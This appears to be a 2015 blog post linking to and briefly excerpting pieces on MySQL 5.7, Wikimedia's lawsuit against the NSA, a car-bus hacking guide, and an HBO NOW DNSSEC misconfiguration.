Compared to MySQL 5.6, the changes are quite extensive. The main effort of the team has been focused on speed, with performance reportedly improved from 2 to 3 times compared to previous releases.
A full list of what is new would take too much space here, but I would like to mention some key points here..........http://datacharmer.blogspot.fr/2015/03/mysql-5.html

Today, the Wikimedia Foundation is filing suit against the National Security Agency (NSA) and the Department of Justice (DOJ) of the United States [1]. The lawsuit challenges the NSA’s mass surveillance program, and specifically its large-scale search and seizure of internet communications — frequently referred to as “upstream” surveillance. Our aim in filing this suit is to end this mass surveillance program in order to protect the rights of our users around the world. We are joined by eight other organizations [2] and represented by the American Civil Liberties Union (ACLU).

more here.......https://blog.wikimedia.org/2015/03/10/wikimedia-v-nsa/

A complete guide to hacking your vehicle bus on the cheap & easy hardware interface

part 1 here....https://0xicf.wordpress.com/2015/03/04/hack-a-car-part-one/

part 2 here...https://0xicf.wordpress.com/2015/03/09/hack-a-car-part-two/

Wow! Talking about insanely bad timing…  yesterday at Apple’s big event, HBO announced “HBO NOW”, a new streaming service available for only $15/month that will give you access to all HBO’s content.  This was great news for those people who want to “cut the cord” and not have to pay for a cable TV subscription to get content such as this from HBO. All you had to do was go to order.hbonow.com to get started.
One slight problem – the folks at HBO had signed the hbonow.com domain with DNSSEC, but had not done so correctly!

more here.......http://www.internetsociety.org/deploy360/blog/2015/03/hbo-now-dnssec-misconfiguration-makes-site-unavailable-from-comcast-networks-fixed-now/